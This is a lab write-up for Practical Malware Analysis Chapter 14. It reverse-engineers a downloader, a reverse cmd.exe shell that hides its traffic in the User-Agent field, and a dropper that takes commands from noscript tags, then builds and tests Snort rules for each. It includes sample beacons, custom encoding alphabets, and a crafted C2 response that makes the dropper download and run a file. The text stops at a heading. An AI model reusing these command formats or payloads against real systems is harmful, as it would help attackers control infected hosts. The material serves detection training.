Practical Malware Analysis - Chapter 14 Lab Write-up
Chapter 14. Malware-Focussed Network Signatures
Operations Security (OPSEC) Considerations:
- Safest option is to not be connected to the internet when analysing malware.
- If you must, use passive information gathering or indirection tactics.
Indirection Tactics:
- Utilise TOR, an open proxy, or a web-based anonymiser when investigating.
- Utilise a dedicated machine for research and hide location via cellular connection, tunnelling via SSH or VPN to remote infrastructure, and/or use a cloud service such as Amazon EC2.
- Note: Cloud services may have specific conditions on running malware/research. Check this to avoid getting your service suspended.
- Utilise a cloud-based sandbox which allows interaction for analysis.
- Note: Many free cloud-based sandboxes are public which immediately poses a risk of notifying an adversary you’re performing analysis.
- Utilise a cloud-based search/scanning service.
- Note: Many free cloud-based search/scanning services are public which immediately poses a risk of notifying an adversary you’re performing analysis.
Commonly used cloud-based tools (As of writing):
- Hybrid Analysis (Falcon Sandbox)
- Any Run (Interactive Online Sandbox)
- Intezer Analyze (Malware Analysis Platform)
- CAPE (Malware Configuration and Payload Extraction Sandbox)
- VirusTotal (File and URL Malware Identification)
- Urlscan.io (Web/URL Scanning Sandbox)
- PublicWWW (Web Source Code Search Engine)
- Threat Crowd (Threat Search Engine)
- Alienvault OTX (Open Threat Intel)
- RiskIQ (Security Intelligence)
- Whois Domain Lookup
- DomainTools (Whois, Domain, DNS Searching)
- MXToolbox (Mail, DNS, and more lookup tools)
- RobTex (Unified Domain, IP, Route and ASN lookup)
- SecurityTrails (Historical DNS Lookup)
Note: This lab uses Snort rules, and in many instances $HOME_NET and $EXTERNAL_NET have been used and changed around. As we are simulating an external C2 using local systems, $HOME_NET has been used to test our rules in many cases where $EXTERNAL_NET would be appropriate (to indicate the connection is coming from an external source).
Lab 14-1
Analyze the malware found in file Lab14-01.exe. This program is not harmful to your system.
Question 1
Which networking libraries does the malware use, and what are their advantages?
Answer 1
Opening the malware using PE-bear, we find that it is importing the Windows DLL urlmon.dll (OLE32 Extensions for Win32) used for Object Linking and Embedding based API calls. Of this it calls the ‘URLDownloadToCacheFile’ API call which leverages COM objects.
By using Fakenet-NG and running this malware, we can see that it beacons to www.practicalmalwareanalysis.com with the below GET request.
GET /ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy/y.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0;
SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.practicalmalwareanalysis.com
Connection: Keep-Alive
If we now utilise a cloud-based tool to parse User Agents called WhatIsMyBrowser, we’re able to ascertain whether this is likely to be a valid, known User Agent or not.
In this instance it is, and it correctly identifies the OS the malware was run from. This is one of the advantages to using COM Interfaces as the request API automatically takes the appropriate User Agent from the operating system.
Question 2
What source elements are used to construct the networking beacon, and what conditions would cause the beacon to change?
Answer 2
In the above example we can see that the networking beacon came out as ‘ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy’. Running the malware again on the same host reveals the same output. By Base64 decoding this we get the below.
- 80:6e:6f:6e:69:63-IEUser
In this instance we believe that the first element is a MAC address of some kind appended with ‘-‘ and the current logged on user. If we run ‘getmac’ to check if this is taken from the network adapters on this system, we find that it doesn’t match.
To further investigate what this is made up from we can open Lab14-01.exe in IDA.
Immediately we can see that a call to GetCurrentHwProfileA is run prior to a call to GetUserNameA which helps to back up what we’ve found so far.
Another way of retrieving the GUID referenced by this API is to check the registry.
reg query "HKLM\System\CurrentControlSet\Control\IDConfigDB\Hardware Profiles" /s
From here we can see that the networking beacon leverages this API which gets the last section (12 characters) from this registry key.
If we run this again in a different machine, we find that it has a different User Agent for the new OS.
GET /ODA6NmQ6NjE6NzI6Njk6NmYtYm9i/i.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.practicalmalwareanalysis.com
Connection: Keep-Alive
In addition to seeing new Base64-encoded data based on this system GUID and user account.
- 80:6d:61:72:69:6f-bob
Question 3
Why might the information embedded in the networking beacon be of interest to the attacker?
Answer 3
As the information uncovered above is meant to be used for uniquely identifying systems and users, this may be of interest to an attacker who wants to keep track of infected clients and specifically target certain users or systems.
Question 4
Does the malware use standard Base64 encoding? If not, how is the encoding unusual?
Answer 4
If we look at the Strings window of this malware we can see what appears to be a Base64-encoding index string.
By looking at cross-references to this we can find it is used inside of ‘sub_401000’ which appears to be our encoding routine. Of interest is that this has a modified ‘padding’ character used as ‘61h’ (a) meaning that any padding required in the Base64-encoded data will appear as the letter ‘a’ rather than the standard ‘=’.
We recognise this construct as it is similar to what we saw in Lab 13-1, question 5 except with the change of padding character.
Question 5
What is the overall purpose of this malware?
Answer 5
To determine this we need to move back to the main method of this malware and examine the call it makes to ‘sub_4011A3’ after the base64-encoding routine occurs. Within this routine we find that a call is made to ‘URLDownloadToCacheFileA’ which is used to download a file to the internet cache directory and return the file name/location.
Of interest is that this is also passed directly to CreateProcessA and as such the file downloaded would be immediately run. Examining the calling process reveals this would wait ‘0EA60h’ (60000) milliseconds if this fails and try to download it again.
As such this malware can be considered to be a ‘Downloader and Launcher’, or ‘Dropper’ used to download and execute further code.
Question 6
What elements of the malware’s communication may be effectively detected using a network signature?
Answer 6
Examining the beacon which is sent we know that it will always send the base64-encoded values followed by a single character png resource which is one element which remains consistent. It should be noted that this character is taken from the final letter in the Base64-encoded content.
In addition to this we know that it sends base64-encoded data via the %s variable passed to sprintf which contains a MAC reference followed by ‘-‘ and a username. Although the username and specific MAC will likely change, the colons and dash which separate this will remain consistent making it another element that can be used.
Finally the beacon makes a request to www.practicalmalwareanalysis.com which is a consistent C2 in this case, making it once again a useful element to use.
Question 7
What mistakes might analysts make in trying to develop a signature for this malware?
Answer 7
Analysts may make a signature too broad or too lax. In this instance if analysis wasn’t done on what is creating the beacon and its use of abnormal padding analysis may make it seem like ‘a.png’ is always being retrieved (for example in the case where padding needed to be used and made the end of the base64-encoded string ‘a’). Another mistake would be to target the User-Agent, username, MAC, or another field which is dynamically set based on the system the malware is run on. If this was setup to alert on any traffic to this domain then in the case of a compromised domain or a domain which is reused it would be very easy to make the rule too broad.
Question 8
What set of signatures would detect this malware (and future variants)?
Answer 8
To detect this malware we’re going to want to create at least 2 Snort rules, one to identify Base64-encoded data sent when fetching the single character png resource, and one to identify any base64-encoded data which has a pattern involving colons and finally a ‘-‘ character.
Creating colon and dash signature:
Because we know that this data is Base64-encoded, we need to first look again at how this translated to the Base64-encoded data we will see. In this case we know that for every 4 bytes of Base64-encoded data it will translate to 3 bytes of plaintext. Examining this decoded data reveals a pattern whereby the presence of a colon after 2 characters (to ensure no padding) is signified ending with the number ‘6’, and the presence of a dash after 2 characters (to ensure no padding) is signified by the letter ‘t’.
From this we need to create some regex which will be used to identify the above pattern signified in words below.
- 3 characters followed by the number ‘6’, 5 times.
- 3 characters followed by the letter ‘t’, 1 time.
- 4 or more characters.
An easy way to start piecing this together is to use an online validation tool such as regex101.
Starting with some base64 detection logic, we want to look for any possible base64 character. Note in this instance we’ve modified the regex to be from “[A-Za-z0-9+\/=]” to be “[A-Za-z0-9+\/a]” due to the custom encoding method used and we’re using quantifiers to match 3 instances followed by the number ‘6’.
[A-Za-z0-9+\/a]{3}6
This makes up the first part of our pattern mentioned above. By changing the number ‘6’ to the letter ‘t’, we get the second part of our detection pattern.
[A-Za-z0-9+\/a]{3}t
To get the third part of our detection pattern we can simply match on 4 or more characters.
[A-Za-z0-9+\/a]{4,}
Finally, we can piece this all together by using a capture group and by specifying the number of hits required.
([A-Za-z0-9+\/a]{3}6){5}[A-Za-z0-9+\/a]{3}t[A-Za-z0-9+\/a]{4,}
Piecing this into a Snort rule we need to ensure this is for the following conditions:
- Only HTTP ports
- Only content which is 32 bytes or above in length (we know this as the smallest MAC address + a username with 1 letter would be 19/3*4 characters long) which is appended by ‘GET’ and prepended by the fetched file name.
- Only GET requests
- Only within the first 10 bytes of the connection
- Uses perl compatible regex (same as what we used for validation with regex101)
- Uses a SID > 1,000,000 (as SID values 1-999,999 are reserved for Snort rule usage)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"PMA Lab14-01 colon and dash"; urilen:>31; content:"GET|20|/"; depth:10; pcre:"/GET\x20\/([A-Za-z0-9+\/a]{3}6){5}[A-Za-z0-9+\/a]{3}t[A-Za-z0-9+\/a]{4,}\//"; sid:1337347; rev:1;)
Using Snort which we’ve setup and configured on a pfSense firewall, we can add in our custom Snort rule.
At this point by running the malware we find that our new Snort rule works and we’ve created our colon and dash signature.
Creating Base64 and png signature:
To move into our second rule, we can do something similar to what we’ve done above, only modify this to instead only look for .png files being requested after a base64-encoded string where the file being requested has the name of the last character from our previously matched base64-encoded string.
[A-Z0-9a-z+\/a]{24,}([A-Z0-9a-z+\/a])\/\1\.png
The end result is the below Snort rule.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"PMA Lab14-01 Base64 and png"; urilen:>31; uricontent:".png"; pcre:"/\/[A-Z0-9a-z+\/a]{24,}([A-Z0-9a-z+\/a])\/\1\.png/"; sid:1337348; rev:1;)
By adding this Snort rule into our pfSense box and running the malware again, we see that both of our Snort rules have been hit.
At this point we’ve now developed some network signatures to detect this malware now and in the future. By combining these with any network traffic to www.practicalmalwareanalysis.com we should have a robust way of detecting this dropper over the wire.
Lab 14-2
Analyze the malware found in file Lab14-02.exe. This malware has been configured to beacon to a hard-coded loopback address in order to prevent it from harming your system, but imagine that it is a hard-coded external address.
Question 1
What are the advantages or disadvantages of coding malware to use direct IP addresses?
Answer 1
If we consider malware that uses direct IP addresses there are a number of advantages and disadvantages for both the malware author, and the defender. If we take this from the malware author’s perspective the following applies.
Advantages:
- IP addresses may host numerous legitimate websites or services, and as such it may be difficult for a defender to just block this at a firewall.
- A static IP address isn’t suceptible to DNS Sinkholing whereby a malicious domain could be sinkholed.
- A domain doesn’t need to be registered, and so there’s no risk of the domain registration being seized, or leaking information that could be used to identify or track the malware author and their actions.
Disadvantages:
- Web requests to a public IP are often suspicious as most people only browse websites through their associated DNS entry.
- Using a static IP ensures that technniques such as Domain Fronting cannot be used.
- Static IP addresses are more difficult to maintain as the infrastructure malware points to is hard-coded, whereas a Domain allows it to be redirected by only updating a DNS Server if infrastructure was to be taken down.
Question 2
Which networking libraries does this malware use? What are the advantages or disadvantages of using these libraries?
Answer 2
Using CFF Explorer VIII we can see that this makes use of WinInet.dll and its associated API calls.
- InternetCloseHandle
- InternetOpenUrlA
- InternetOpenA
- InternetReadFile
An advantage of these API calls is that they are more granular and as such has access to work with caching and cookies. In addition they don’t rely on a COM object which if corrupted could cause issues.
A disadvantage of these API calls is that they require many elements such as a User Agent to be manually entered. A comparison between WinInet and WinHTTP can be found here
Question 3
What is the source of the URL that the malware uses for beaconing? What advantages does this source offer?
Answer 3
If we leverage Fakenet-NG and run the malware we can see that it makes a request to the local system loopback IP of 127.0.0.1 (in this case we pretend this is a C2 IP). This occurs with an unusual user agent which is then followed by another request with an unusual user agent ‘Internet Surf’.
Lab14-02.exe (2140) requested TCP 127.0.0.1:80
GET /tenfour.html HTTP/1.1
User-Agent: (!<e6LJC+xnBq90daDNB+1TDrhG6p9LC/iNBqsGiIsVgJCqhZaDZoNZBrXtC+L/AcoGfbhNdZdUhZKGe6LJC+xnBq90dliTC/XTC+a0A6xSgIWGo6VQdc3N9qH0CmXm97iLC/9L9YsiYG0fonNC4c3T9r3HB41HDbaC8qHT8qxQ871LE5VQA63CCbpHBbaICmt+Bbam95V0BqxQCpVoC+aJDbLJ86UGe6aQDqam92XXB+aQE7iNCmXh863n7l3NB+amE4iTBbVL8r1NBqtCoqHHCc1LCLwVilUy
Host: 127.0.0.1
Cache-Control: no-cache
GET /tenfour.html HTTP/1.1
User-Agent: Internet Surf
Host: 127.0.0.1
Cache-Control: no-cache
To determine the source of this IP we can work back from the networking calls we found inside of WinInet.dll using IDA. The subroutine which call these can be found at ‘sub_4015C0’ or ‘sub_401800’ which is also called by ‘sub_4015C0’.
If we look at how this is launched by examining cross-references, we find that these network connections are being launched in their own threads one after another from within WinMain which reflects what we’ve seen during the dynamic analysis above.
In both of these calls the source of the URL is being passed to them, so we need to continue looking back to see how this is fetched. Of note is that directly before these network calls we can see evidence of pipes being created and cmd.exe starting which leads us to believe this malware may be a reverse TCP command shell.
Of interest is that at the start of this program we find a call to ‘LoadStringA’ which is used to load in a string resource which is then stored within a buffer of EAX which currently holds a reference to ‘[esp+1A8h+Buffer]’. This is then loaded into ebx which becomes the read handle, or ‘input’ stream into this anonymous pipe. Due to an Event Object creation used to prevent thread conflicts and multiple anonymous pipe operations this can be difficult to explain; however, a simplified overview of how this works is below.
If we take a look at the resource section of this malware using PE-bear we can see that the C2 in question is what we saw in our dynamic analysis.
http://127.0.0.1/tenfour.html
From this we know that the source of the URL that the malware uses for beaconing is a string contained within the resource section of this malware. As embedded resources can be easily modified this provides an advantage of allowing the C2 to change, or for this to function as a backdoor to multiple different C2 servers without having to modify and recompile the binary.
Question 4
Which aspect of the HTTP protocol does the malware leverage to achieve its objectives?
Answer 4
From our dynamic analysis there looks to be some strange data contained within the User-Agent field so we investigate that further. First we look at the thread creation which uses the anonymous pipe we saw created in the previous section.
Within StartAddress at ‘0x004014C0’ we can see this calls ‘PeekNamedPipe’ with the read end of the anonymous pipe being referenced in ECX, and the output being sent to ESI (the source for an upcoming string operation).
In this instance if content exists on the named pipe (for example the output from cmd.exe starting or output of commands being run into this terminal) the malware proceeds to run sub_401000 passing in ESI to its buffer prior to running loc_401750.
Looking at sub_401000 which is passed the output from our anonymous pipe we find that this construct is familiar and looks to be a Base64-encoding routine which is leveraging a value defined by ‘byte_403010’.
Examining byte_403010 we find that this looks to be referencing an unknown value followed by looks to be our Base64 index string.
To fix this we can convert all of it to be the string we’d expect as follows.
WXYZlabcd3fghijko12e456789ABCDEFGHIJKL+/MNOPQRSTUVmn0pqrstuvwxyz
In this instance the base pointer contains our base64 encoded content and is then used within loc_401750 to concatenate our encoded content with the value ‘(!<’.
From this we know that the malware leverages the User-Agent to achieve its objectives.
Question 5
What kind of information is communicated in the malware’s initial beacon?
Answer 5
Taking our output from running the malware and our knowledge from the above analysis on custom Base64 index string used, we can decode the output and confirm this is the standard output of cmd.exe being run.
From this we know the initial beacon is an encoded command prompt.
Question 6
What are some disadvantages in the design of this malware’s communication channels?
Answer 6
To identify some disadvantages in the design of this malware’s communication channels we can look within ‘sub_4015C0’ which is what is run within the second thread of this malware. Inside of this we immediately see this uses ‘sub_401800’ to make the outgoing internet connection, so we examine this further.
inside sub_401800 we can see what appears to be very basic operations with a hardcoded User-Agent of “Internet Surf” being sent with the output being passed directly into our anonymous pipe of cmd.exe which is then read and the internet connection closed.
At this point we know the communication channels both to and from the anonymous pipe to cmd.exe. What’s apparent is that outgoing connections use a hardcoded User-Agent which can be used to fingerprint this malware. In addition no encoding is done on commands being sent from the server.
To detect this malware we can create and test some Snort rules; however, given this is set to beacon to the local system’s loopback address it will never traverse through our gateway, and as such our pfSense system running Snort will never see the traffic. In addition if there’s no resource receiving the connection on the end then the initial internet connection fails prior to any User-Agent being sent and we are left without any Snort rules being triggered.
For us to get around this we first need to modify the resource section of this malware (e.g. by using Resource Hacker) to instead beacon to a private IP we have control over and can run a couple of netcat listeners on. One issue we encounter here is that the malware is set to read a certain amount of characters from this resource section, so whatever IP address we choose to beacon to needs to be the same number of characters (9) as 127.0.0.1.
To get around this we can use a hardcoded DNS entry (in this case CYBERAIJU) consisting of 9 characters, and then modify our hosts file to point this to a private IP we control.
Note - Depending on how the malware was run, whether there was a successful network connection, and how the malware threads are ended, we may find that the malware has deleted itself. It’s recommended a backup of the malware be created.
Creating Suspicious Resource signature:
In this instance we can now setup a basic Snort rule for the malware and see if this works. One consistent element in this malware is that it always fetches a resource at ‘/tenfour.html’ which although in itself may only be a low to medium fidelity indicator, is a good starting point.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"PMA Lab14-02 Suspicious Resource"; uricontent:"/tenfour.html"; sid:1337349; rev:1;)
If we now setup netcat listeners on our receiving machine (in this case 10.13.13.107) and add in the created Snort rule we can see if it worked.
Upon running the malware we see 2 successful connections to our Netcat listeners for both threads as expected.
Checking our snort alerts we find 2 successful alerts based on connections to this C2 resource.
Creating Suspicious User Agent signatures:
In this instance we’re going to leverage the unique User-Agent elements used by this malware and also classify this classtype as ‘trojan-activity’ to give the alert a little more weighting and severity.
In this instance we’ll use the ‘Internet Surf’ User-Agent.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"PMA Lab14-02 Suspicious User-Agent - Internet Surf"; flow:to_server; content:"User-Agent|3A 20|Internet|20|Surf"; http_header; classtype:trojan-activity; sid:1337350; rev:1;)
In addition to any User-Agent beginning with “(!<”.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"PMA Lab14-02 Suspicious User-Agent - Starts with (!<"; flow:to_server; content:"User-Agent|3A 20|(!<"; http_header; classtype:trojan-activity; sid:1337351; rev:1;)
If we repeat the process used to test our suspicious resource signature, we can see there’s new alert hits this time categorising the activity as a network trojan and assigning a severity level of 1.
The combination of these alerts is enough for any responder to have a strong indication of malicious activity occurring on this system.
Question 7
Is the malware’s encoding scheme standard?
Answer 7
From our analysis in question 4 we know that the malware’s encoding scheme is Base64 but not using the standard index string.
Question 8
How is communication terminated?
Answer 8
Looking back into this malware within IDA, after establishing a connection through ‘sub_401800’ contained within ‘sub_4015C0’, a comparison is then made looking for the term ‘exit’.
If this is found then the thread will exit and communication will be terminated. Inside of the main method we find that upon this program finishing or threads being killed this runs a sub-routine at ‘sub_401880’.
Taking a look into this sub-routine it appears to be used simply to issue a file delete on the malware once it is finished running, failed to run/connect back to its C2, or if it had its threads terminated.
Question 9
What is the purpose of this malware, and what role might it play in the attacker’s arsenal?
Answer 9
From our analysis above we know the purpose of this malware is to establish a reverse TCP command shell which passes data through a user-agent to try and evade network analysis techniques. Given the malware attempts to delete itself it’s likely this is only used during initial access to a system prior to further malware or persistence being setup and is simply a disposable means to an end.
Lab 14-3
This lab builds on Lab 14-1. Imagine that this malware is an attempt by the attacker to improve his techniques. Analyze the malware found in file Lab14-03.exe.
Question 1
What hard-coded elements are used in the initial beacon? What elements, if any, would make a good signature?
Answer 1
By running the malware and using Fakenet-NG, we can get a glimpse of the beacon this sends.
If we compare this beacon to elements seen in Lab14-1 we find the below.
Lab 14-1:
GET /ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy/y.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.practicalmalwareanalysis.com
Connection: Keep-Alive
Lab 14-3:
GET /start.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.practicalmalwareanalysis.com
Of interest is that this beacon has sent some new or modified elements in its HTTP Header including the below:
- Accept-Language
- UA-CPU
- User-Agent
Based on this we begin to assume these may be hard-coded elements. Looking closely at the User-Agent it looks as if the malware author may have a bug in their code because it’s sent “User-Agent: “ as part of the User Agent. This would make a good signature.
If we open up IDA and look for reference to this beacon based on the User-Agent, we find that in addition to the above 3 elemets, the header fields of ‘Accept’ and ‘Accept-Encoding’ are also hard-coded, as is the beacon URL.
http://www.practicalmalwareanalysis.com/start.htm
Question 2
What elements of the initial beacon may not be conducive to a longlasting signature?
Answer 2
If we examine the hard-coded URL above and where it is referenced, we find that it is located in a function ‘sub_401457’.
Of interest is that this attempts to get a handle on a file C:\autobat.exe with read access. Where this fails it will call ‘sub_401372’ which is used to create the file and write into it the contents of this hard-coded URL C2 before running itself again. Where this succeeds it will get a handle on the file and read it into a buffer which is then later used in ‘sub_4011F3’ within the main method.
If we take a look at cross-references which call ‘sub_401372’, we find that there’s one other function which calls it within ‘sub_401651’. If we continue to examine cross-references it looks like this may be taking input from the C2 indicating that there’s another way for this C2 URL to be written to ‘C:\autobat.exe’. From this we can assume a couple of things:
- The domain and URL found in this are hard-coded but only if an existing file C:\autobat.exe with a configured C2 isn’t present.
- The Domain, URL, Host, or GET parameters wouldn’t be conductive to a longlasting signature.
- By creating a 0-byte inoculation file at C:\autobat.exe we can effectively prevent this malware from beaconing to its C2.
Question 3
How does the malware obtain commands? What example from the chapter used a similar methodology? What are the advantages of this technique?
Answer 3
Taking a closer look at sub_4011F3 we found earlier, we can see that after attempting to initiate the C2 beacon connection, we can see that after reading the .htm file hosted in the C2, it begins searching for elements which start with “<no” in addition to performing a subroutine at sub_401000 before comparing other elements.
To properly unravel this we can take a closer look into sub_401000 which looks to be involved in constructing a comparison string. What is initially obvious ios that there are a number of comparisons looking for HEX characters, so it appears this may be a string obfuscation technique to make analysis more challenging.
If we use ‘r’ on the hex characters we can convert them into their letter equivalent. In addition we need to pay attention to the movsx operations beforehand which help to guide us in the order the string comparison will take place (this takes the form of ‘register + position’).
If we expand these comparisons out and sort by the position number we get the below:
movsx ecx, byte ptr [eax]
cmp ecx, 'n'
movsx edx, byte ptr [ecx+1]
cmp edx, 'o'
movsx eax, byte ptr [edx+2]
cmp eax, 's'
movsx ecx, byte ptr [eax+3]
cmp ecx, 'c'
movsx ecx, byte ptr [eax+4]
cmp ecx, 'r'
movsx eax, byte ptr [edx+5]
cmp eax, 'i'
movsx edx, byte ptr [ecx+6]
cmp edx, 'p'
movsx eax, byte ptr [edx+7]
cmp eax, 't'
movsx edx, byte ptr [ecx+8]
cmp edx, '>'
This in turn allows us to see it is checking for the entry “
Based on the search being read and comparisons taking place, we can assume this filter is looking for something similar to the below where
<noscript><DYNAMICCONTENT>http://www.practicalmalwareanalysis.com/<COMMAND>/<ARG>96'
For a final piece of analysis we take a look at sub_401684 which is run immediately preceding this response and appears to bne running one of 3 different subroutines depending on the response received.
This leads us to believe that the malware obtains commands through <noscript> tags which is similar to Lab06-02.exe which leveraged ‘!<’ comments in web pages for C2. The advantages of this technique is that the commands are being fetched from inside a legitimate webpage, so without thoroughly scrutinising the page or malware it would be hard to fingerprint and even detect this malware.
Question 4
When the malware receives input, what checks are performed on the input to determine whether it is a valid command? How does the attacker hide the list of commands the malware is searching for?
Answer 4
Based on the above analysis we know that the malware receives input from the C2 and looks for the presence of <noscript> followed by the expected domain it is fetching (e.g. http://www.practicalmalwareanalysis.com/), a command, and the number 96. If we examine sub_401684 which is passed the URL we found previously we can see that it uses ‘strtok’ to tokenise (break apart) the URL being passed to it before comparing it to see if it has the character ‘d’ passed.
This comes in the form of a switch whereby case ‘0’ (loc_4016E9) is run when it finds the value ‘d’. This comparison is looking for the first byte of the first token. From this the switch uses reference to a table at byte_40173E to then look within an offset stored at ‘off_40172A’.
The calculations on specifically translating these offsets into values can be confusing as it uses an index to determine which case to jump to. An easy way to describe this is to view byte_40173E as undefined data as shown below.
Essentially if the character sent is 10 higher than ‘d’, the switch case to run is ‘1’. If the character sent is 14 higher than ‘d’ the switch case to run is 2. If the character sent is 15 higher than ‘d’ the switch case to run is 3. Otherwise the switch case to run is 4.
Adding these onto ‘d’ (4) you get ‘n’ (14), ‘r’ (18), and ‘s’ (19) respectively.
These cases take an input which is only evaluated from the first character in the command sent from the server. So in this case any word starting with ‘d’, ‘n’, ‘r’, or ‘s’ can be sent to run a command through this malware.
Question 5
What type of encoding is used for command arguments? How is it different from Base64, and what advantages or disadvantages does it offer?
Answer 5
Examining ‘loc_40170E’ we find that it runs ‘sub_401651’ which calls what looks to be a decoding routine at ‘sub_401147’. Within this we can see what appears to be a non-standard encoding routine. We know this because it doesn’t quite follow the basis of breaking 3 bytes into 4 bytes, and instead has a call to ‘strlen’ to break this string apart for encoding, before ‘ebp+var_4’ is increasing by 1, and ‘ebp+var_8’ is increasing by 2.
If we take a look at what we would usually presume to be an index string in the case of Base64-encoding, we can see that it isn’t made up of enough characters, nor does it have all the values required. Close analysis reveals that this takes 2 chars which are then turned into a number, and then cross references that number to an index within the identified string.
/abcdefghijklmnopqrstuvwxyz0123456789:.
An advantage of this is that it is non-standard so isn’t easily fingerprinted and would need to be reversed. A disadvantage is that it is fairly basic, and by understanding it we will be able to create some robust signatures in later questions due to the known structure of how URLs are used.
Question 6
What commands are available to this malware?
Answer 6
To determine what commands are available to is malware we need to look into the subroutines inside of ‘sub_401684’. Remembering the array we identified in question 4, the possible cases and their triggers are shown below.
- Case 0 (d): loc_4016E9
- Case 1 (n): loc_4016F7
- Case 2 (r): loc_40170E
- Case 3 (s): loc_401700
- Case 4 (other): loc_401723
You’ll notice this order is slightly different to how it is shown left -> right in IDA.
In this instance 3 options cause a subroutine to be called, whereas one just updates a variable which is then used to quit the C2 loop and thus the program. The possible subroutines and their associated trigger letter are shown below.
- d: sub_401565
- n: NO SUBROUTINE (quit)
- r: sub_401651
- s: sub_401613
By examining sub_401565 (d) we get a pretty clear indication that this takes an argument before using this to download and run another application. This also uses a call to ‘sub_401147’ so we know the argument passed takes uses the previously identified decoding routine.
By examining sub_401613 (s) we can see that this looks to be a simple sleep function which sleeps for 20,000 milliseconds if no argument was given, otherwise it sleeps for however many seconds were sent as an argument.
By examining sub_401651 (r) we can see that this has a call to ‘sub_401147’ to decode any provided URL, before calling ‘sub_401372’ which we identified in question 2 as being responsible for updating the C2 configuration file.
Putting this all together we know what commands are available to this malware.
Question 7
What is the purpose of this malware?
Answer 7
Based on the above commands available to this malware we can presume this is a malware dropper AKA a ‘Downloaders and Launcher’. This differs from traditional throwaway malware which may exist only to drop malware before removing itself in that it sets up persistence to allow further malware and C2 to be dropped over time.
Question 8
This chapter introduced the idea of targeting different areas of code with independent signatures (where possible) in order to add resiliency to network indicators. What are some distinct areas of code or configuration data that can be targeted by network signatures?
Answer 8
Because the malware leveraged custom, yet simple encoding mechanisms, static, yet configurable domain names, User-Agent errors, and a few other static elements such as commands being sent via the C2, we can use all of this to create specific snort rules to identify this malware. As we are focussing on network signatures, we can target the initial beacon of the malware and subsequent commands sent down via the web-based C2.
Question 9
What set of signatures should be used for this malware?
Answer 9
Expanding on the above, we can split this section into identifying the initial beacon, and then the subsequent C2 commands before testing our rules.
Beacon:
We gathered up the static elements of this beacon in question 1. The specific elements are highlighted below.
- Accept-Language
- UA-CPU
- User-Agent
- Accept
- Accept-Encoding
Because we can specify the C2 with autobat.exe, we can modify this to point to our own system. Given we’ve already defined ‘CYBERAIJU’ to point to one of our controlled hosts, let’s continue to use this, and create a Snort rule based on all the hardcoded elements of this beacon.
If we wanted to limit this to one hardcoded element over another it would be trivial to do; however for the purpose of thoroughly identifying every static element of this beacon for a high confidence hit, we have added all to our Snort rule.
Side Note: Given header elements stretch over many lines the hex ‘0D 0A’ needs to be used to signal a new line feed, and many other special characters will need to be converted to hex.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"PMA Lab14-03 Duplicate User-Agent and known hardcoded headers"; flow:to_server; content:"Accept|3A 20|*/*|0D 0A|Accept-Language|3A 20|en-US|0D 0A|UA-CPU|3A 20|x86|0D 0A|Accept-Encoding|3A 20|gzip|2C 20|deflate|0D 0A|User-Agent|3A 20|User-Agent|3A 20|Mozilla/4.0|20|(compatible|3B 20|MSIE|20|7.0|3B 20|Windows|20|NT|20|5.1|3B 20|.NET|20|CLR|20|3.0.4506.2152|3B 20|.NET|20|CLR|20|3.5.30729)"; http_header; classtype:trojan-activity; sid:1337352; rev:1;)
The end result is a thorough Snort rule which identifies this malware beacon
Command Generic:
To test any Snort created rules we will need to simulate a command being sent from the initial beacon. To do this we can use the same netcat listeners as previous, and simply respond with content we know will be contained in a web response as a command. As a start we know the general syntax of a command being sent.
<noscript><DYNAMICCONTENT>http://www.practicalmalwareanalysis.com/<COMMAND>/<ARG>96'
The consistent elements in this response include “
alert tcp $HOME_NET any -> $HOME_NET any (msg:"PMA Lab14-03 C2 based on noscript tag and 96'"; content:"<noscript>"; content:"http|3A 2F 2F|"; distance:0; within:1024; content:"96'"; distance:0; within:1024; classtype:trojan-activity; sid:1337352; rev:1;)
Testing in the same way as before, we can respond to the netcat command by sending a test payload.
The end result is our rule being hit.
It should be noted that in the above we have used a command of ‘Security’. One would assume because this starts with ‘s’ that the malware will sleep; however, the character is case-sensitive which we will need to keep in mind for the coming rules aimed at detecting each command sent.
Command d or r:
Given our knowledge of the encoding algorithm used, we can create a robust signature which looks for any command beginning with ‘d’ or ‘r’. We know that either of these commands must be followed by an encoded URL. Because the URL encoding uses a number mapping to a string previously identified:
/abcdefghijklmnopqrstuvwxyz0123456789:.
Because every URL is expected to be specified via ‘http://’ We simply need to determine what the encoded number value of ‘http://’ would be. This used 2 bytes for each number, so starting with ‘00’ this would look like the below given each character mentioned above simply increments the number value by 1.
http://
08202016370000
An end result would look like either of the below which could be used to trigger the malware with an ‘d’ or ‘r’ command being run.
<noscript>sefgdgesgfhttp://CYBERAIJU/doctor/082020163700004123496'
<noscript>sefgdgesgfhttp://CYBERAIJU/real/082020163700004123496'
Turning this into a Snort rule we could use something like the below.
alert tcp $HOME_NET $HTTP_PORTS -> $HOME_NET any (msg:"PMA Lab14-03 C2 d or r command ran"; content:"|2F|08202016370000"; pcre:"/\/[dr][^\/]*\/08202016370000/"; classtype:trojan-activity; sid:1337353; rev:1;)
The end result is our rule being hit after testing as we did above.
Command s:
